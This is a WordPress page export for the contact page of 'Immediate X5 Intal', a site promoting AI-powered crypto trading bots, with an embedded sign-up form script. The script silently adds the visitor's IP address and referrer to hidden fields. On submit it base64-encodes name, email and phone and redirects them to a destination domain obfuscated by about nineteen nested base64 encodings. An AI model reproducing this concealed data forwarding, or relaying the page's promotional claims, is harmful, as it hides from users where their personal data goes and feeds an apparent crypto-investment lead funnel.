{"id":187,"date":"2024-04-30T14:23:49","date_gmt":"2024-04-30T14:23:49","guid":{"rendered":"https:\/\/immediateintal.de\/get-in-touch-with-us\/"},"modified":"2024-07-16T09:48:21","modified_gmt":"2024-07-16T09:48:21","slug":"get-in-touch-with-us","status":"publish","type":"page","link":"https:\/\/immediateintal.de\/en-ca\/get-in-touch-with-us\/","title":{"rendered":"Get in touch with us"},"content":{"rendered":"\n<p>At Immediate X5 Intal, we are committed to providing you with the best possible service and support while you explore our AI-powered crypto trading bots. Our dedicated team will be happy to answer any questions, concerns or suggestions you may have.<\/p>\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-1 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\r\n\r\n<div class=\"info_block\" id=\"info_block-block_d1d0c2ca950f78d7e5b09cf4f4bce87b\">\r\n    <h2>Customer support<\/h2>\n<p>Our expert customer service team is available around the clock to help you with all aspects of using our platform &#8211; from account setup to bot customization and troubleshooting. You can reach us via live chat, e-mail.<\/p>\n<p><strong>E-Mail:<\/strong> <a href=\"mailto:support@immediateintal.de\">support@immediateintal.de<\/a><\/p>\n<p>We look forward to hearing from you and accompanying you on your journey through algorithmic crypto trading. Do not hesitate to contact us at any time &#8211; our team is always ready to help you.<\/p>\n<\/div>\r\n\r\n<style>\r\n.info_block {\r\n  position: relative;\r\n  display: block;\r\n  width: 100%;\r\n  margin: 40px auto;\r\n  padding: 13px 16px;\r\n  border-radius: 10px;\r\n  background: rgba(19,12,102,0.05);\r\n}\r\n.info_block h3 {\r\n  font-size: 1em;\r\n  color: #130c66;\r\n  font-weight: 500;\r\n}\r\n<\/style><\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<h2 class=\"wp-block-heading\">Get in touch with us<\/h2>\n\n\n\r\n\r\n<style>\r\n    .CxgTdZ{\r\n        position: relative;\r\n        display: grid;\r\n        width: 100%;\r\n        grid-template-areas:\r\n        \"hErhSYdYW1 hErhSYdYW2\"\r\n        \"hErhSYdYW3 hErhSYdYW3\"\r\n        \"hErhSYdYW4 hErhSYdYW4\"\r\n        \"hErhSYdYW5 hErhSYdYW5\";\r\n        max-width:500px;\r\n        gap:15px;\r\n    }\r\n    .CxgTdZ .TtAwHf:nth-child(1){\r\n        grid-area:hErhSYdYW1;\r\n    }\r\n    .CxgTdZ .TtAwHf:nth-child(2){\r\n        grid-area:hErhSYdYW2;\r\n    }\r\n    .CxgTdZ .LCYti{\r\n        grid-area:hErhSYdYW3;\r\n    }\r\n    .CxgTdZ .zRsuqgP{\r\n        grid-area:hErhSYdYW4;\r\n    }\r\n    .CxgTdZ .cGEkq{\r\n        grid-area:hErhSYdYW5;\r\n    }\r\n    .OgmMqYcC{\r\n        position:relative;\r\n        display:block;\r\n        width:100%;\r\n    }\r\n    .OgmMqYcC input{\r\n        width: 100%;\r\n        height:40px;\r\n        border-radius:5px;\r\n        border:1px solid rgba(0,0,0,.15);\r\n    }\r\n\r\n    .CxgTdZ .cGEkq input{\r\n        background-color:#ffffff;\r\n        font-weight:bold;\r\n        color: #056238;\r\n    }\r\n    .CxgTdZ .cGEkq input:hover{\r\n        cursor:pointer;\r\n    }\r\n    .OgmMqYcC .iti{\r\n        width:100%;\r\n    }\r\n    .CxgTdZ [data-type='validator-error'] {\r\n        font-size: 11px;\r\n        position: absolute;\r\n        z-index: 10;\r\n        margin-top: 2px;\r\n        color: #ffffff;\r\n        background: rgb(200, 53, 53);\r\n        box-shadow: 0 6px 2px -2px rgba(211, 77, 77, 0.47);\r\n        padding: 4px 10px;\r\n        border-radius: 1px;\r\n        pointer-events: none;\r\n    }\r\n    .CxgTdZ [data-type='validator-error']:before {\r\n        content: '';\r\n        width: 0;\r\n        height: 0;\r\n        top: -5px;\r\n        position: absolute;\r\n        left: 6px;\r\n        border-left: 5px solid rgba(0, 0, 0, 0);\r\n        border-right: 5px solid rgba(0, 0, 0, 0);\r\n        border-bottom: 5px solid #c83535;\r\n    }\r\n<\/style>\r\n\r\n<form id=\"fEbukaTXcL\">\r\n    <div class=\"CxgTdZ\" id=\"cta\">\r\n        <div class=\"OgmMqYcC TtAwHf\">\r\n        <input data-rule=\"required\" type=\"text\" placeholder=\"Pr\u00e9nom\" name=\"first_name\" value=\"\" aria-describedby=\"first_name\">\r\n    <\/div>\r\n        <div class=\"OgmMqYcC TtAwHf\">\r\n        <input data-rule=\"required\" type=\"text\" placeholder=\"Nom de famille\" name=\"last_name\" value=\"\" aria-describedby=\"last_name\">\r\n    <\/div>\r\n        <div class=\"OgmMqYcC LCYti\">\r\n        <input data-rule=\"required|email\" type=\"email\" placeholder=\"E-mail\" name=\"email\" value=\"\" aria-describedby=\"email\">\r\n    <\/div>\r\n    <div class=\"OgmMqYcC zRsuqgP\">\r\n        <input type=\"tel\" id=\"UAhqlqYt\" data-rule=\"phone|required\" placeholder=\"T\u00e9l\u00e9phone\" name=\"phone\" value=\"\" aria-describedby=\"phone\">\r\n    <\/div>\r\n    <div class=\"OgmMqYcC cGEkq\">\r\n        <input value=\"Envoyer\" type=\"submit\">\r\n    <\/div>\r\n    <input type=\"hidden\" name=\"form\" value=\"jLBYilmxWu\">\r\n    <input type=\"hidden\" name=\"ip\" value=\"\">\r\n    <input type=\"hidden\" name=\"jLBYilmxWu1\" value=\"\">\r\n    <input type=\"hidden\" name=\"jLBYilmxWu2\" value=\"\">\r\n    <input type=\"hidden\" name=\"jLBYilmxWu3\" value=\"immediateintal.de\">\r\n    <input type=\"hidden\" name=\"jLBYilmxWu4\" value=\"\" >\r\n    <input type=\"hidden\" name=\"jLBYilmxWu5\" value=\"\" >\r\n    <input type=\"hidden\" name=\"jLBYilmxWu6\" value=\"\" >\r\n    <input type=\"hidden\" name=\"jLBYilmxWu7\" value=\"\" >\r\n    <input type=\"hidden\" name=\"jLBYilmxWu8\" value=\"\" >\r\n    <\/div>\r\n<\/form>\r\n\r\n<script>\r\ndocument.addEventListener('DOMContentLoaded', ()=>{\r\n    const input = document.querySelector(\"#UAhqlqYt\");\r\n    let JbPUt = {\r\n                'en': {\r\n                    'FIRST_NAME' : 'First Name',\r\n                    'LAST_NAME' : 'Last Name',\r\n                    'EMAIL' : 'Email',\r\n                    'PHONE' : 'Mobile Phone',\r\n                    'SUBMIT' : 'Join Now',\r\n                },\r\n                'de': {\r\n                    'FIRST_NAME' : 'Bitte Vornamen eingeben',\r\n                    'LAST_NAME' : 'Nachnamen eingeben',\r\n                    'EMAIL' : 'Email eingeben',\r\n                    'PHONE' : 'Dein Handy',\r\n                    'SUBMIT' : 'Jetzt registrieren',\r\n                },\r\n                'zh': {\r\n                    'FIRST_NAME' : '\u540d',\r\n                    'LAST_NAME' : '\u59d3',\r\n                    'EMAIL' : '\u7535\u5b50\u90ae\u4ef6',\r\n                    'PHONE' : '\u7535\u8bdd',\r\n                    'SUBMIT' : '\u63d0\u4ea4',\r\n                },\r\n                'sv': {\r\n                    'FIRST_NAME' : 'F\u00f6rnamn',\r\n                    'LAST_NAME' : 'Efternamn',\r\n                    'EMAIL' : 'E-post',\r\n                    'PHONE' : 'Mobiltelefon',\r\n                    'SUBMIT' : 'B\u00f6rja nu',\r\n                },\r\n                'es' : {\r\n                    'FIRST_NAME' : 'Nombre de pila',\r\n                    'LAST_NAME' : 'Apellido',\r\n                    'EMAIL' : 'Correo electr\u00f3nico',\r\n                    'PHONE' : 'Tel\u00e9fono m\u00f3vil',\r\n                    'SUBMIT' : '\u00danete Ahora',\r\n                },\r\n                'da' : {\r\n                    'FIRST_NAME' : 'Fornavn',\r\n                    'LAST_NAME' : 'Efternavn',\r\n                    'EMAIL' : 'E-mail',\r\n                    'PHONE' : 'Mobiltelefon',\r\n                    'SUBMIT' : 'Deltag nu',\r\n                },\r\n                'hr' : {\r\n                    'FIRST_NAME' : 'Ime',\r\n                    'LAST_NAME' : 'Prezime',\r\n                    'EMAIL' : 'E-mail',\r\n                    'PHONE' : 'Mobitel',\r\n                    'SUBMIT' : 'Pridru\u017eite se sada',\r\n                },\r\n                'nl' : {\r\n                    'FIRST_NAME' : 'Voornaam',\r\n                    'LAST_NAME' : 'Achternaam',\r\n                    'EMAIL' : 'E-mail',\r\n                    'PHONE' : 'Mobiele telefoon',\r\n                    'SUBMIT' : 'Doe nu mee',\r\n                },\r\n                'tr' : { \r\n                    'FIRST_NAME' : '\u0130sim',\r\n                    'LAST_NAME' : 'Soyad\u0131',\r\n                    'EMAIL' : 'E-posta',\r\n                    'PHONE' : 'Telefon',\r\n                    'SUBMIT' : 'G\u00f6nder',\r\n                },\r\n                'hu' : {\r\n                    'FIRST_NAME' : 'Keresztn\u00e9v',\r\n                    'LAST_NAME' : 'Vezet\u00e9kn\u00e9v',\r\n                    'EMAIL' : 'E-mail',\r\n                    'PHONE' : 'Telefon',\r\n                    'SUBMIT' : 'Elk\u00fcld\u00e9s',\r\n                },\r\n                'it' : {\r\n                    'FIRST_NAME' : 'Nome',\r\n                    'LAST_NAME' : 'Cognome',\r\n                    'EMAIL' : 'E-mail',\r\n                    'PHONE' : 'Telefono',\r\n                    'SUBMIT' : 'Invia',\r\n                },\r\n                'pl' : {\r\n                    'FIRST_NAME' : 'Imi\u0119',\r\n                    'LAST_NAME' : 'Nazwisko',\r\n                    'EMAIL' : 'E-mail',\r\n                    'PHONE' : 'Telefon',\r\n                    'SUBMIT' : 'Wy\u015blij',\r\n                },\r\n                'pt' : {\r\n                    'FIRST_NAME' : 'Nome',\r\n                    'LAST_NAME' : 'Sobrenome',\r\n                    'EMAIL' : 'E-mail',\r\n                    'PHONE' : 'Telefone',\r\n                    'SUBMIT' : 'Enviar',\r\n                },\r\n                'gsw' : {\r\n                    'FIRST_NAME' : 'Vorname',\r\n                    'LAST_NAME' : 'Nachname',\r\n                    'EMAIL' : 'E-mail',\r\n                    'PHONE' : 'Telefon',\r\n                    'SUBMIT' : 'Abschicken',\r\n                },\r\n                'fr' : {\r\n                    'FIRST_NAME' : 'Pr\u00e9nom',\r\n                    'LAST_NAME' : 'Nom de famille',\r\n                    'EMAIL' : 'E-mail',\r\n                    'PHONE' : 'T\u00e9l\u00e9phone',\r\n                    'SUBMIT' : 'Envoyer',\r\n                },\r\n                'fi' : {\r\n                    'FIRST_NAME' : 'Etunimi',\r\n                    'LAST_NAME' : 'Sukunimi',\r\n                    'EMAIL' : 'S\u00e4hk\u00f6posti',\r\n                    'PHONE' : 'Puhelin',\r\n                    'SUBMIT' : 'L\u00e4het\u00e4',\r\n                },\r\n                'ar':{\r\n                    'FIRST_NAME' : '\u0627\u0644\u0627\u0633\u0645_\u0627\u0644\u0623\u0648\u0644',\r\n                    'LAST_NAME' : '\u0627\u0644\u0627\u0633\u0645_\u0627\u0644\u0627\u0633\u0645_\u0627\u0644\u0623\u062e\u064a\u0631',\r\n                    'EMAIL' : '\u0627\u0644\u0628\u0631\u064a\u062f \u0627\u0644\u0625\u0644\u0643\u062a\u0631\u0648\u0646\u064a',\r\n                    'PHONE' : '\u0627\u0644\u0647\u0627\u062a\u0641',\r\n                    'SUBMIT' : '\u0625\u0631\u0633\u0627\u0644',\r\n                },\r\n                'no':{\r\n                    'FIRST_NAME' : 'Fornavn',\r\n                    'LAST_NAME' : 'Etternavn',\r\n                    'EMAIL' : 'E-post',\r\n                    'PHONE' : 'Telefon',\r\n                    'SUBMIT' : 'Send til',\r\n                },\r\n                'cs':{\r\n                    'FIRST_NAME' : 'K\u0159estn\u00ed jm\u00e9no',\r\n                    'LAST_NAME' : 'P\u0159\u00edjmen\u00ed',\r\n                    'EMAIL' : 'E-mail',\r\n                    'PHONE' : 'Telefonn\u00ed \u010d\u00edslo',\r\n                    'SUBMIT' : 'Odeslat na adresu',\r\n                },\r\n                'hi':{\r\n                    'FIRST_NAME' : '\u092a\u0939\u0932\u093e \u0928\u093e\u092e',\r\n                    'LAST_NAME' : '\u0909\u092a\u0928\u093e\u092e',\r\n                    'EMAIL' : '\u0908\u092e\u0947\u0932',\r\n                    'PHONE' : '\u091f\u0947\u0932\u0940\u092b\u094b\u0928 \u0928\u0902\u092c\u0930',\r\n                    'SUBMIT' : '\u0905\u092c \u0936\u093e\u092e\u093f\u0932 \u0939\u094b\u0902',\r\n                }\r\n            };\r\n\r\n    function CUyGV(c){\r\n        if(c){\r\n            let wpml_lang = 'en-ca';\r\n            if(wpml_lang!=''){\r\n                c = (wpml_lang.indexOf('-') != -1) ? wpml_lang.split('-')[0] : wpml_lang;\r\n            } else {\r\n                c = (c.indexOf('-') != -1) ? c.split('-')[0] : c;\r\n            }\r\n            document.querySelector('.CxgTdZ [name=first_name]').setAttribute('placeholder', (JbPUt[c]) ? JbPUt[c]['FIRST_NAME']: JbPUt['en']['FIRST_NAME']);\r\n            document.querySelector('.CxgTdZ [name=last_name]').setAttribute('placeholder', (JbPUt[c]) ? JbPUt[c]['LAST_NAME']:  JbPUt['en']['LAST_NAME']);\r\n            document.querySelector('.CxgTdZ [name=email]').setAttribute('placeholder', (JbPUt[c]) ? JbPUt[c]['EMAIL']:  JbPUt['en']['EMAIL']);\r\n            document.querySelector('.CxgTdZ [name=phone]').setAttribute('placeholder', (JbPUt[c]) ? JbPUt[c]['PHONE']:  JbPUt['en']['PHONE']);\r\n            document.querySelector('.CxgTdZ [type=submit]').setAttribute('value', (JbPUt[c]) ? JbPUt[c]['SUBMIT']:  JbPUt['en']['SUBMIT']);\r\n        }\r\n    }\r\n    window.intlTelInput(input, {\r\n        initialCountry: \"auto\",\r\n        showSelectedDialCode: true,\r\n        utilsScript: \"https:\/\/cdn.jsdelivr.net\/npm\/intl-tel-input@21.2.7\/build\/js\/utils.js\",\r\n        geoIpLookup: function(success, failure) {\r\n            fetch(\"https:\/\/ipapi.co\/json\")\r\n            .then(function(res) { return res.json(); })\r\n            .then(function(data) { document.querySelector('.CxgTdZ [name=ip]').value = data.ip; country = Array.isArray(data.languages) ? data.languages[0] : data.languages; CUyGV(country); success(data.country_code); })\r\n            .catch(function(e) { console.log('error:', e); failure(); });\r\n        },\r\n        hiddenInput: function(telInputName) {\r\n            return {\r\n                phone: \"phone_full\",\r\n            };\r\n        }\r\n    });\r\n\r\n    function df(){\r\n        let df = document.referrer ? document.referrer : document.location.hostname;\r\n        if (df) {\r\n            document.querySelector('.CxgTdZ [name=jLBYilmxWu5]').value = df;\r\n        }\r\n    }\r\n\r\n    function d_d(d){\r\n        let i = 1;\r\n        let dom = d[0];\r\n        while(i < d[1]){\r\n            dom = atob(dom);\r\n            i++; \r\n        }\r\n        return dom;\r\n    }\r\n\r\n    $vs = new Validator(document.querySelector('#fEbukaTXcL'), function e(rr, res) {\r\n        return res;\r\n        }, {\r\n        autoTracking: true,\r\n    });\r\n\r\n    document.querySelector('#fEbukaTXcL').addEventListener('submit', (e)=>{\r\n        e.preventDefault();\r\n        if($vs.validate()){ \r\n            if (typeof gtag === 'function') {\r\n                gtag('event', 'form_submit', {\r\n                    'url': location.href,\r\n                });\r\n            }\r\n            df();\r\n            const data = new FormData(document.querySelector('#fEbukaTXcL'));\r\n            const di = {};\r\n            for (let [key, value] of data.entries()) {\r\n                di[`${key}`] = value;\r\n            }\r\n            let dataJSON = encodeURIComponent(btoa(JSON.stringify(di)));\r\n            let d = d_d(JSON.parse(JSON.stringify([\"Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVmpBeFYySkVUbGhoTVVwVVZqQmFTMlJIVmtkWGJGcE9ZV3RGZUZadGNFSmxSbGw1VTJ0V1ZXSkhhRzlVVjNOM1pVWmFkR05GZEZSTlZXdzFWVEowVjFaWFNraGhSemxWVm0xb1JGWldXbUZrUjFaSFYyMTRVMkpIZHpGV2EyUXdZekpHYzFOdVVtaFNlbXhXVm1wT1QwMHhjRlpYYlVaclVqQTFSMWRyV2xOVWJVWTJVbFJHVjFaRmIzZFdha1poVjBaT2NtRkhhRk5sYlhoWFZtMXdUMVF3TUhoalJscFlZbFZhY1ZadGRHRk5SbFowWlVoa1YwMUVSa1pWYkZKSFZqRmFSbUl6WkZkaGExcG9WakJhVDJOdFJraGhSazVzWWxob1dGWnRNSGhPUm14V1RVaG9XR0pyTlZsWmJGWmhZMnhXY1ZGVVJsTk5WMUo1VmpJMWExWXdNVVZTYkdSYVRVWmFNMVpxU2t0V1ZrcFpXa1p3VjFKV2NIbFdWRUpoVkRKT2MyTkZhR3BTYXpWWVZXcE9iMkl4V25STldHUlZUVlpXTkZVeGFHOWhiRXB6WTBac1dtSkdXbWhaTW5oWFkxWkdWVkpzVGs1WFJVcElWbXBLTkZReFdsaFRhMlJxVW14d1dGbHNhRk5OTVZweFUydDBWMVpyY0ZwWGExcDNWakZLVjJOSWJGZFdSVXBvVmtSS1QyTXlUa1poUjNCVFlYcFdXVlpYY0U5aU1rbDRWMjVTVGxkSFVsWlVWbHBYVGtaVmVHRkhPV2hpUlhCNldUQmFjMWR0U2tkWGJXaGFUVzVvV0ZreFdrZFdWa3B6VkdzMVYwMVZiekZXYlhCS1RWZEZlRmRZWkU1V1ZscFVXV3RrVTFsV1VsWlhiVVpPVFZad2VGVXlkREJXTVZweVkwWndXR0V4Y0hKWlZXUkdaVWRPUjJKR2FHaE5WbkJ2Vm10U1MxUXlVa2RVYmtwaFVteEtjRlpxU205bGJHUllaVWM1YVUxWFVraFdNalZUVkd4YVJsTnNhRlZXYkZZMFZHdGFZVmRIVWtoa1JtUk9WakZLU2xkV1ZtRmpNV1IwVTJ0b2FGSnNTbGhVVlZwM1ZrWmFjVkp1WkZOV2ExcDVWREZrYzFVd01IbGhSbXhYWWxoQ1RGUnJXbEpsUm1SellVWlNhRTFzU25oV1Z6QjRUa2RHUjFaWVpHaFNWVFZWVlcxNGQyVkdWWGxrUjBacFVteHdlbFl5ZUhkWFIwVjRZMFJPV21FeVVrZGFWM2hIWTIxS1IxcEdaRTVOUlhCS1ZtMTBVMU14VlhoWFdHaFhZbXhhVjFsc2FFTldSbXh5Vm01a1YxWnNjREJhVldNMVZXc3hXRlZ1Y0ZkTlYyaDJWakJrUzFKck5WZFZiRlpYWWxaRmQxWnFSbUZXTWxKSVZXdG9hMUp0VWs5V2FrWkxVMnhrVjFadFJtcE5WMUl3VlRKMGExZEhTbGhoUjBaVlZteHdNMXBYZUhKbFYxWklaRWQwVTJFelFYZFhiRlpoWVRKR1dGSllaR3BTVjNoWVdXeG9RMVJHVW5KWGJFcHNVbTFTZWxsVldsTmhSVEZ6VTI1b1YxWjZSVEJhUkVaclVqSktTVlJ0YUZOaGVsWjZWMWQwWVdReVZrZFdXR3hyVWtWS1dGUldXbmRsVmxsNVpVaGtXR0pHY0ZoWk1HaExWMnhhV0ZWclpHRldNMmhJV1RJeFMxSXlSa2RoUmxKVFZsaENTMVp0TVRCVk1VMTRWbGhvV0ZkSGFHaFZNRnBoVm14c2NsZHJkR3BTYkhCNFZrY3dOVll4V25OalJXaFlWa1UxZGxsV1ZYaFhSbFoxWTBaa1RsWXlhREpXTVZwaFV6RkplRlJ1VmxKaVJscFlWRlJHUzA1c1draGxSMFphVmpGS1IxUnNXbUZWUmxwMFZXNUNWMkpIYUVSVk1WcGhZMVpPY1ZWc1drNVdNVWwzVmxSS01HSXlSa2RUYms1VVlrZG9WbFpzV25kTk1WcHlWMjFHYWxack5YbFhhMXBQWVZaS2NtTkVXbGRoTWs0MFdYcEdWbVZXVG5WVGJGSnBWbFp3V1ZaR1l6RmlNV1JIV2taa1dHSkZjSE5WYlRGVFpXeHNWbGRzVG1oV2EzQXhWVmMxYjFZeFdYcGhTRXBYVmtWYWVsWnFSbGRqTVdSellVZHNhVlpyY0RaV01XUXdXVmRSZVZaclpGZGliRXBQVm14a1UxWnNVbGhrU0dSVFRWWnNOVnBWYUd0WFIwcEhZMFpvV2sxSGFFeFdha1poVW14a2NtVkdaRTVXYmtKSlYxUkplRk14U1hsU2EyUm9VbXhLVkZac2FFTlRNVnAwVFZSQ1ZrMVZNVFJXYkdodlYwWmtTR0ZHYkZwaVdHaG9WbTE0YzJOc2NFaFBWM0JUWWtoQ05GWnJZM2RPVmxsNFYyNVNWbUpIYUZoV2FrNU9UVlphV0dNemFHcGlWWEJHVmxkNGExUnNXWGxoUkVwWFRWWndhRlY2Umt0ak1WSjFWV3hDVjJKR2NGbFhWM1J2VVRGa1YxZHJhR3hTTUZwaFZtMHhVMUl4VW5OWGJVWldVbXh3TUZsVldsTlhiVXBIWTBWNFZrMXVhSEpXYWtaaFpFWktkR05GTlZkTlZXd3pWbXhTUzAxSFJYaGFSV2hVWWtkb2IxVnFRbUZXYkZwMFpVaGtUazFYZUZkV01qVnJWVEpLU1ZGclpGVk5WbFV4V1ZaYVMxZFdSbkZXYkdSVFRUSm9iMWRXVWt0U01WbDRZMFZhWVZKck5XOVphMmhEVjFaa1YxcEVRbXRpVmtZMFZqSjRWMVV5U2tkalNFNVdZbFJHVkZSV1dsWmxWMDQyVW14a1RsWnVRalpYVkVKaFZqRmtSMWR1VGxSaE1taG9WV3RXWVdOc1ZuRlRhM1JVVm14S01GbFZXazlpUjBwWllVWkdWMkV4Y0doWFZtUlNaVlphY2xwR1pHbGlSWEJRVm0xNGExVXhXWGhWYkdoclUwZFNXRlJXWkRSbFZscFlUVlZrV0ZKcmJETldiWEJUVjJzeFNHRkZlRmROYm1ob1ZqQmFWMk5zY0VoU2JHUlhUVlZ3VWxac1pIZFRNVTE0VTFoc1UyRXlVbTlWYlhoTFZrWmFjMkZGVGxSTlZuQjRWVzB4UjFack1WWk5WRkpYVm0xb2VsWnNXbXRUUjBaSVlVWmFUbEp1UW05V2JURTBZekpPYzFwSVNtdFNNMEpVV1d0YWQwNUdXbGhOVkVKT1VteHNORll5TlU5aGJFcFlZVVpvVjJGck5WUldSVnB6VmxaR1dXRkdUbGRoTTBJMlZtdGtORmxXVlhsVGExcFlWMGhDV0Zac1duZFNNVkY0VjJ0T1ZtSkZTbFpVVlZGM1VGRTlQUT09\",19])));\r\n            document.location = `https:\/\/${d}\/?action=tr&data=${dataJSON}`;\r\n        } else {\r\n            console.log('fail');\r\n        }\r\n    });\r\n    window.formLoaded = true;\r\n});\r\n<\/script>\r\n\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>At Immediate X5 Intal, we are committed to providing you with the best possible service and support while you explore our AI-powered crypto trading bots. Our dedicated team will be happy to answer any questions, concerns or suggestions you may have. Get in touch with us<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"inline_featured_image":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"acf":[],"_links":{"self":[{"href":"https:\/\/immediateintal.de\/en-ca\/wp-json\/wp\/v2\/pages\/187"}],"collection":[{"href":"https:\/\/immediateintal.de\/en-ca\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/immediateintal.de\/en-ca\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/immediateintal.de\/en-ca\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/immediateintal.de\/en-ca\/wp-json\/wp\/v2\/comments?post=187"}],"version-history":[{"count":3,"href":"https:\/\/immediateintal.de\/en-ca\/wp-json\/wp\/v2\/pages\/187\/revisions"}],"predecessor-version":[{"id":205,"href":"https:\/\/immediateintal.de\/en-ca\/wp-json\/wp\/v2\/pages\/187\/revisions\/205"}],"wp:attachment":[{"href":"https:\/\/immediateintal.de\/en-ca\/wp-json\/wp\/v2\/media?parent=187"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}